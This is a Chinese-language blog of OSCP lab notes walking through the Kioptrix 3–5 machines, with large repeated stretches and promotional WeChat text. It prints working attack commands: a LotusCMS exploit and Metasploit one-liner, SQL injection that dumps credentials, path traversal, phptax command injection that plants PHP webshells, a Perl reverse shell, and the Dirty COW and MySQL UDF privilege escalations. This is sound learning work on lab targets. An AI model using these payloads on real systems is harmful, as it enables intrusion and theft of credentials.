暂时没有想法，先从其他地方继续收集信息。从80网页点进去发现一个登录窗口。

主页点gallery会跳转到新的地址，但是图片之类的都显示不出来。

2025年2月8日 15点45分

中间去工作了，然后发现自己没有安装BurpSuit，原本装的Pro版，后来刷机刷没了，Yakit的劫持也忘了配置，浏览器插件没有装，去安装了一下。安装步骤可以看最后面。

2025年2月8日 18点49分

Lotus CMS 漏洞&passwd漏洞

先找找Lotus CMS有没有什么漏洞，这个是登录网页的框架。搜索发现如下工具。

https://github.com/Hood3dRob1n/LotusCMS-Exploit

选择1，反弹成功。

接下来需要提权成root。

目前这个中腹案不太好看，发现有python，给他弄成交互式终端。

python -c 'import pty; pty.spawn("/bin/bash")'

查询终端信息。

试了一些常规的提权方法不行，翻翻看文件夹，发现home文件夹下有个READEME文件。

 1
 2Hello new employee,
 3It is company policy here to use our newly installed software for editing, creating and viewing files.
 4Please use the command 'sudo ht'.
 5Failure to do so will result in you immediate termination.
 6
 7DG
 8CEO
 9---
10你好，新员工，使用我们新安装的软件来编辑、创建和查看文件是公司的规定。请使用命令“sudo ht”。如果不这样做，你将被立即解雇。DG首席执行官

sudo了一下也不行。另一个文件好像也不是有用的。

回到READEME的提示，会发现要执行的时候没有paswwd，所以想从etc/passwd方向入手。看到有两个poc：40847.cpp和40839.c

编译第一个

 1g++ -o 40847 40847.cpp
 2./40847 -h
 3---
 4./40847 [-s] [-n] | [-h]
 5
 6 -s open directly a shell, if the exploit is successful;
 7 -n combined with -s, doesn't restore the passwd file.
 8 -h print this synopsis;
 9
10 If no param is specified, the program modifies the passwd file and exits.
11 A copy of the passwd file will be create in the current directory as .ssh_bak
12 (unprivileged user), if no parameter or -n is specified.
13
14---
15-s如果攻击成功，直接打开shell；
16-n和-s组合，不恢复passwd文件。-h打印概要；
17如果没有指定参数，程序将修改passwd文件并退出。
18在当前目录中将以.ssh的形式创建passwd文件的副本_如果不指定参数或-n，则为Bak（非特权用户）。

失败，换40839，编译报错，提示缺少库文件。

文件中给出了编译命令。

1gcc -pthread 40839.c -o 40839 -lcrypt

下载到靶机上编译执行。

这里我没注意看，它提示重置密码，我直接输入成了ls，等待他执行改密操作。

他现在提示我现在可以用ls做密码登录账户firefart，注意添加 -o 参数，不然版本太低登不进去。登不进去就直接su firefart

1ssh -o HostKeyAlgorithms=+ssh-rsa firefart@192.168.139.131

虽然名字不是root，但是权限是root。

页面sql注入漏洞

因为之前找到phpadmin登陆界面，应该是有sql漏洞的。

主页点击浏览，发现有很多图片显示不出来，点击任意一个链接发现跳转新的域名，这个域名不是已经注册的，可能是跳转自己，但是DNS没有解析。

修改本机Host文件，让这个域名解析到指定ip，就是靶机的ip。

保存host文件，刷新一下浏览器就有了。

发现疑似注入的入口。

存在，可用，接下来就是调参了。

sqlmap 自动注入

懒人用sqlmap走一下捷径，实际考试sqlmap有限制次数，所以小的能手注的还是练习一下。

1sqlmap -u http://192.168.139.131/gallery/gallery.php?id=1* --dbs --batch
2sqlmap -u http://192.168.139.131/gallery/gallery.php?id=1* -D gallery --tables --batch
3sqlmap -u http://192.168.139.131/gallery/gallery.php?id=1* -D gallery -T gallarific_users --dump-all

最后一步爆库很慢

手动注入

 1http://kioptrix3.com/gallery/gallery.php?id=1' # 报错
 2http://kioptrix3.com/gallery/gallery.php?id=1 # 不报错，是整数型注入
 3http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,33,44,55,66
 4http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,database(),user(),44,55,66 
 5# 回显 database()为gallery，user()为root@localhost
 6http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,group_concat(schema_name),44,55,66 from information_schema.schemata
 7# 回显 information_schema,gallery,mysql
 8http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,group_concat(TABLE_NAME),44,55,66 from information_schema.TABLES where TABLE_SCHEMA=database()
 9# 回显 dev_accounts,gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallarific_stats,gallarific_users
10# gallarific_users 里可能会有用户名和密码 查表
11http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,group_concat(column_name),44,55,66 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='gallarific_users' 
12# 回显 userid,username,password,usertype,firstname,lastname,email,datejoined,website,issuperuser,photo,joincode
13http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,username,password,44,55,66 from gallery.gallarific_users
14# 回显 admin n0t7t1k4
15http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,group_concat(concat_ws(':',username,password)) ,44,55,66 from gallery.gallarific_users
16# 回显 admin:n0t7t1k4
17http://kioptrix3.com/gallery/gallery.php?id=1 union select 11,22,group_concat(concat_ws(':',username,password)) ,44,55,66 from gallery.dev_accounts
18# 回显 dreg:0d3eccfb887aabd50f243b3f155c0f85,loneferret:5badcaf789d3d1d09794d8f021f40f0e

1# 回显 admin:n0t7t1k4
2# 回显 dreg:0d3eccfb887aabd50f243b3f155c0f85,loneferret:5badcaf789d3d1d09794d8f021f40f0e
3---
4# 解密后为 https://www.cmd5.com/default.aspx
5admin:n0t7t1k4
6dreg:Mast3r
7loneferret:starwars

ssh登录

1ssh -oHostKeyAlgorithms=+ssh-rsa admin@192.168.139.131
2ssh -oHostKeyAlgorithms=+ssh-rsa dreg@192.168.139.131
3ssh -oHostKeyAlgorithms=+ssh-rsa loneferret@192.168.139.131

除了admin的账户登不上，其他的都可以登录，这里可以又回到之前的用passwd漏洞切换账户。

suid 提权

也可以用suid方法提权。

1find / -perm -u=s -type f 2>/dev/null # 发现有sudo 命令

2025年2月8日 22点27分

做到这里一开始怀疑是40839的问题，后来解压了新靶机也不行，推测是靶机文件问题，从官方渠道下载新的。 https://download.vulnhub.com/kioptrix/KVM3.rar 等着下载，然后正好也歇一会

2025年2月8日 22点39分

按键盘alt+w唤出选择界面，选择打开/etc/sudoers。

修改添加/bin/sh使root权限可以再bash中使用。保存退出。

MSF 工具箱 LotusCMS RCE

1searchsploit lotuscms

注意OSCP考试只能使用一次MSF工具箱，所以应该掌握多种攻击方法。

先在2另一个终端开启监听。

1set rhosts 192.168.139.132
2set uri /index.php?system=Admin
3set lhost 192.168.139.128
4set lport 9001
5set payload generic/shell_reverse_tcp

然后再已经开启的9001端口就可以看得到回弹了。也可以把上述msf命令写成一行。

1msfconsole -q -x 'use exploit/multi/http/lcms_php_exec;set uri /index.php?system=Admin;set rhosts 192.168.139.132;set lhost 192.168.139.128;set lport 9001;set payload generic/shell_reverse_tcp;run'

phpadmin 漏洞

使用LotusCMS漏洞进去后还有个地方进去。在配置文件下有数据库的账号密码。

1cd gallery
2cat gconfig.php
3---
4$GLOBALS["gallarific_mysql_server"] = "localhost";
5$GLOBALS["gallarific_mysql_database"] = "gallery";
6$GLOBALS["gallarific_mysql_username"] = "root";
7$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

Kioptrix: Level 1.3 (#4)

老样子先看网段。

打开网页看，一个登录入口，弱密码和sql注入试了似乎不行。

目录扫描发现似乎有敏感文件泄露。

没有什么发现，重新用dirsearch扫描试试。

直接用john/1234登录index是不行的，但是继续扫描发现有额外的登录页面。试了也不行。

只有返回登陆界面试试sqlmap自动注入，尽量别用，下次有别的思路再试试。

1sqlmap -r KP4.txt --dump --batch --level 3

1Database: members
2Table: members
3[2 entries]
4+----+-----------------------+----------+
5| id | password | username |
6+----+-----------------------+----------+
7| 1 | MyNameIsJohn | john |
8| 2 | ADGAdsafdfwt4gadfga== | robert |
9+----+-----------------------+----------+

网页能登录，但是啥也没有，试试ssh登录。

1ssh -o HostKeyAlgorithms=+ssh-rsa john@192.168.139.133

登上去后发现应该是命令受限，只能使用几个命令，whoami都不行。help发现只能用下面这几个。

用echo就能逃逸这个终端环境到bash环境，用更多命令。

1find / -name "*.php" 2>/dev/null

找一下php文件，刚刚目录扫描出来的文件泄露有php，所以可能有php文件泄露。

两个php文件内容是一样的，其他的看了也没有特别的发现，这里写了用户名和密码，root，空密码，是mysql的密码。

1 mysql -u root -p

然后再在mysql里面用udf提权，老演员了。

UDF提权方法1-手动哈希注入

1show global variables like "secure_file_priv";
2select @@version_compile_os, @@version_compile_machine;

这个属性为空值就可以提权。

不太确认用哪个了，而且plung目录似乎没有，这个方法不行。

UDF提权方法2-sys_exec函数提权

sys_exec可以使用系统命令，直接把john加管理员里。

1select * from mysql.func
2select sys_exec('usermod -a -G admin john');

udf提权方法3-sqlmap提权

以上是手动写入的方法，以下是sqlmap自动写入的方法，sqlmap使用前提是知道账号密码。

1sqlmap -d "mysql://root:@192.168.139.133:3306/mysql" --os-shell

此处应用失败是因为靶机的mysql端口没有打开，只是在内部访问。

2025年2月21日 17点27分

Kioptrix: 2014 (#5)

2025年2月22日14点04分

官方推荐的靶场笔记博客 https://www.abatchy.com/2017/01/kioptrix-2014-5-walkthrough-vulnhub.html

打开靶机，扫描靶机。

端口，ssh没有开放，就一个80和8080端口开放。

主页就一个静态网页。

curl网页源码发现一个应该是框架的东西pChart从名字看应该改是画图之类的东西。搜索相关利用漏洞，只有一个。

先测试一下能不能打开这个网页，如果打不开，Vmware提示什么FreeBSD tools更新之类的是vmware犯病，不用管也不用更新，重启靶机就行。

然后就能用这个漏洞看文件了，看密码，看apache配置。

1http://192.168.139.134/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
2http://192.168.139.134/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

2025年2月22日 15时18分

之前能打开一次，估计时靶机有问题，然后vmware老提示FreeBSD tools安装的问题，不确定是哪一个，重新下载官方镜像，然后安装VBox 和相关插件再试试，我看官网是用Vbox 的。还有可能是劫持问题。后面试了有觉得可能是因为刷靶机中途开了加速器玩了几把Kards，开加速器的时候把代理干废了，然后就登不上了。

是玩游戏导致代理混乱，重新在BurSuit中配置代理的方法。这个是我翻墙的代理，平时都开着。

burp连代理有时候不成功，多试几次，可能是因为机场问题，检查一下机场节点是不是超过300ms了。

2025年2月24日 14点25分

就是代理问题，回头要重新配代理，刷靶机的时候不要瞎玩游戏。

可以看到服务器配置信息里写了，配置信息里写了用mozilla的请求头就可以访问8080

如果没有安装hackbar，也可以用curl方法判断。

搜索并下载相关poc。

这里他给出了漏洞原理是phptax有个漏洞，就可以利用这个漏洞执行命令。这里恶意代码执行的是nc -l -v -p 23235 -e /bin/bash，需要在攻击机上启动nc监听端口来接收反弹的shell。但是，我查了网上的一些攻略帖子说nc bash php python都弹不回来，可能是靶机没有这几个命令或者限制用这几个命令。

链接靶机

方法1：一句话木马链接蚁剑终端

先测试靶机能不能执行命令。

1http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;ls%20-al%20%3e1.txt;&pdf=make

或者在BurpSuit里面抓包后send

把一句话木马加工到上面的连接中

1<?php system($_GET["cmd"]);?>
2http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;ls%20-al%20%3e1.txt;&pdf=make
3http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php system($_GET["cmd"]);?>' > 222.php;&pdf=make
4http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php system($_REQUEST["cmd"]);?>' > ant.php;&pdf=make

然后再执行一次ls看1.txt里面有111.php了。然后也能成功执行命令。

蚁剑安装包：https://www.yuque.com/antswordproject/antsword/srruro

2025年2月24日 18点04分

也可关注公众号泷羽Sec-静安，后台回复找工具+Day4获取。

2025年2月25日 9点15分

1http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php system($_REQUEST["cmd"]);?>' > ant.php;&pdf=make

注意，蚁剑要用上面这句_REQUEST生成的木马php才可以连成功。

方法2：perl弹nc反连

1nc -lvnp 4777
2perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.139.128:4777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
3http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.139.128:4777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;';&pdf=make

方法3：msf全家桶一键（不推荐考试只有一次机会）

不知道为什么没有终端传过来，可能是msf版本问题，外国人写的几个教程都比较老了21年以前的msf。msf版本更新是会出现一些打不进去的情况。要多走几条路，条条大路通罗马，根根网线通靶机。

提权

用26368.c，这里注意检查一下靶机上有没有gcc，有的话就先传c文件，到靶机编译。然后顺带查一下有哪些传文件的命令，有nc和ftp可以用。

新版的kali直接开ftp服务器有点问题，提示要下载包，但是下载也有问题。

1sudo apt install pipx
2pipx ensurepath
3pipx install pyftpdlib
4pipx run pyftpdlib --directory=. --port=2121 --write

或者传到Windows本机物理机上的终端开ftp。

1pip install pyftpdlib
2 python -m pyftpdlib

1ftp ftp://192.168.139.1:2121/26368.c

然后再在靶机上用ftp的命令下载。

用蚁剑的话可以直接传文件。但是蚁剑的终端显示不了root，所以混合着用。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day5 Kioptrix 系列靶机4-5

Wed, 26 Feb 2025 16:47:42 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。关注公众号泷羽Sec-静安，后台回复找工具+Day4获取BurpSuit 和Yakit安装包。

最近忙这学C++，还有工作调动，好消息是我升职了，祝各位同行也早日升职，走上人生巅峰，实现财富自由，我也向着这个目标努力哈哈哈。前两天在忙着找房子租房子，找了一圈下来基本都要1500+/月，一室一厅一卫，最后还是算了，睡单位破宿舍得了，免费又近，上下班时间2分钟，除了洗澡洗衣服不方便。而且后面忙起来可能会一直在办公室加班，在办公室学习也不错的。我们办公室学习氛围很好。

2025年2月21日 16点12分

Kioptrix: Level 1.3 (#4)

老样子先看网段。

打开网页看，一个登录入口，弱密码和sql注入试了似乎不行。

目录扫描发现似乎有敏感文件泄露。

没有什么发现，重新用dirsearch扫描试试。

直接用john/1234登录index是不行的，但是继续扫描发现有额外的登录页面。试了也不行。

只有返回登陆界面试试sqlmap自动注入，尽量别用，下次有别的思路再试试。

1sqlmap -r KP4.txt --dump --batch --level 3

1Database: members
2Table: members
3[2 entries]
4+----+-----------------------+----------+
5| id | password | username |
6+----+-----------------------+----------+
7| 1 | MyNameIsJohn | john |
8| 2 | ADGAdsafdfwt4gadfga== | robert |
9+----+-----------------------+----------+

网页能登录，但是啥也没有，试试ssh登录。

1ssh -o HostKeyAlgorithms=+ssh-rsa john@192.168.139.133

登上去后发现应该是命令受限，只能使用几个命令，whoami都不行。help发现只能用下面这几个。

用echo就能逃逸这个终端环境到bash环境，用更多命令。

1find / -name "*.php" 2>/dev/null

找一下php文件，刚刚目录扫描出来的文件泄露有php，所以可能有php文件泄露。

两个php文件内容是一样的，其他的看了也没有特别的发现，这里写了用户名和密码，root，空密码，是mysql的密码。

1 mysql -u root -p

然后再在mysql里面用udf提权，老演员了。

UDF提权方法1-手动哈希注入

1show global variables like "secure_file_priv";
2select @@version_compile_os, @@version_compile_machine;

这个属性为空值就可以提权。

不太确认用哪个了，而且plung目录似乎没有，这个方法不行。

UDF提权方法2-sys_exec函数提权

sys_exec可以使用系统命令，直接把john加管理员里。

1select * from mysql.func
2select sys_exec('usermod -a -G admin john');

udf提权方法3-sqlmap提权

以上是手动写入的方法，以下是sqlmap自动写入的方法，sqlmap使用前提是知道账号密码。

1sqlmap -d "mysql://root:@192.168.139.133:3306/mysql" --os-shell

此处应用失败是因为靶机的mysql端口没有打开，只是在内部访问。

2025年2月21日 17点27分

Kioptrix: 2014 (#5)

2025年2月22日14点04分

官方推荐的靶场笔记博客 https://www.abatchy.com/2017/01/kioptrix-2014-5-walkthrough-vulnhub.html

打开靶机，扫描靶机。

端口，ssh没有开放，就一个80和8080端口开放。

主页就一个静态网页。

curl网页源码发现一个应该是框架的东西pChart从名字看应该改是画图之类的东西。搜索相关利用漏洞，只有一个。

先测试一下能不能打开这个网页，如果打不开，Vmware提示什么FreeBSD tools更新之类的是vmware犯病，不用管也不用更新，重启靶机就行。

然后就能用这个漏洞看文件了，看密码，看apache配置。

1http://192.168.139.134/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
2http://192.168.139.134/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

2025年2月22日 15时18分

是玩游戏导致代理混乱，重新在BurSuit中配置代理的方法。这个是我翻墙的代理，平时都开着。

burp连代理有时候不成功，多试几次，可能是因为机场问题，检查一下机场节点是不是超过300ms了。

2025年2月24日 14点25分

就是代理问题，回头要重新配代理，刷靶机的时候不要瞎玩游戏。

可以看到服务器配置信息里写了，配置信息里写了用mozilla的请求头就可以访问8080

如果没有安装hackbar，也可以用curl方法判断。

搜索并下载相关poc。

链接靶机

方法1：一句话木马链接蚁剑终端

先测试靶机能不能执行命令。

1http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;ls%20-al%20%3e1.txt;&pdf=make

或者在BurpSuit里面抓包后send

把一句话木马加工到上面的连接中

1<?php system($_GET["cmd"]);?>
2http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;ls%20-al%20%3e1.txt;&pdf=make
3http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php system($_GET["cmd"]);?>' > 222.php;&pdf=make
4http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php system($_REQUEST["cmd"]);?>' > ant.php;&pdf=make

然后再执行一次ls看1.txt里面有111.php了。然后也能成功执行命令。

蚁剑安装包：https://www.yuque.com/antswordproject/antsword/srruro

2025年2月24日 18点04分

也可关注公众号泷羽Sec-静安，后台回复找工具+Day4获取。

2025年2月25日 9点15分

1http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php system($_REQUEST["cmd"]);?>' > ant.php;&pdf=make

注意，蚁剑要用上面这句_REQUEST生成的木马php才可以连成功。

方法2：perl弹nc反连

1nc -lvnp 4777
2perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.139.128:4777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
3http://192.168.139.134:8080/phptax/drawimage.php?pfilez=xxx;perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.139.128:4777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;';&pdf=make

方法3：msf全家桶一键（不推荐考试只有一次机会）

提权

用26368.c，这里注意检查一下靶机上有没有gcc，有的话就先传c文件，到靶机编译。然后顺带查一下有哪些传文件的命令，有nc和ftp可以用。

新版的kali直接开ftp服务器有点问题，提示要下载包，但是下载也有问题。

1sudo apt install pipx
2pipx ensurepath
3pipx install pyftpdlib
4pipx run pyftpdlib --directory=. --port=2121 --write

或者传到Windows本机物理机上的终端开ftp。

1pip install pyftpdlib
2 python -m pyftpdlib

1ftp ftp://192.168.139.1:2121/26368.c

然后再在靶机上用ftp的命令下载。

用蚁剑的话可以直接传文件。但是蚁剑的终端显示不了root，所以混合着用。

小技巧

一句话木马和反弹shell的命令记不得可以用这个插件—— Hack Tools。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Oscp on 静静的安全笔记

OSCP Official Lab — Stapler Writeup

Information Gathering

Port and Directory Scanning

FTP Anonymous Login

FTP Username Brute-Force

SSH Login Brute-Force

History Command Leak

Log in as Peter and Escalate Directly

Other Methods

Ways to Get a Shell

Port 12380 Web

phpMyAdmin Database Admin Panel

blogblog Blog System

advanced-video Plugin

Admin John Logs into WP Backend and Uploads Reverse Shell

MySQL Database

Obtain Blog System User Passwords

MySQL Webshell Upload

Samba Service on Port 139

Methods for Root Privilege Escalation

Kernel Exploit: CVE-2016-4557

Kernel Exploit: CVE-2021-4034

Method 1: One-Click PoC Script from GitHub

Method 2: Kali’s Built-in MSF Module (Requires Existing Meterpreter Session)

Cron Job Privilege Escalation

Two Mysterious Scripts Run by Root

Port 666 Rabbit Hole Becomes a Real Hole

Dead-End Rabbit Holes Explored

announcements Directory File Leak

admin112233 — XSS

Finding Which Fool Logged in with Plaintext SSH

Port 666 Discovery

SMB Open Shares

Easter Egg New Users

Akismet Plugin XSS Vulnerability

shortcode-ui and two-factor Plugins Have No Applicable Vulnerabilities

Search Box SQL Injection Failed

CVE-2021-3156 Privilege Escalation Failed

Common WebShell Techniques

Pitfalls

Nmap Network Fluctuation Missed Ports

Summary

Attack Path Diagram

Attack Timeline

OSCP官方靶场-Stapler-WP

信息收集

扫描端口和目录

FTP 匿名登陆

FTP登录用户名爆破

SSH 登录爆破

History历史记录泄露

登录Peter账户直接提权

其他的方法

进shell的方法

12380网页

phpMyadmin 数据库管理后台

blogblog博客系统

advanced-video插件

John管理员登录WP后台上传反弹shell

数据库mysql

获得blog博客系统的用户密码

mysql上传一句话木马

139 端口上的samba服务

提权root的方法

内核漏洞提权 CVE-2016-4557

内核漏洞提权 CVE-2021-4034

方式一：直接用 GitHub 上的一键利用脚本

方式二：Kali 自带 MSF 模块（需要已有 meterpreter session）

定时任务提权

root 运行的两个神秘脚本

666端口兔子洞变真洞

钻了没用的兔子洞

announcements的文件泄露

admin112233-XSS

看看是哪个大冤种明文登录ssh

666端口发现

smb开放的文件夹

彩蛋一样的新用户

Akismet 插件XSS漏洞

1.1. `/etc/services`

1.2. `/etc/hosts`

1.3. `/etc/hostname`

1.4. `/etc/resolv.conf`

2.1. `/proc/net/tcp` 和 `/proc/net/udp`

2.2. `/proc/net/tcp6` 和 `/proc/net/udp6`

2.3. `/proc/net/unix`

4.1. `/etc/inetd.conf` 或 `/etc/xinetd.conf`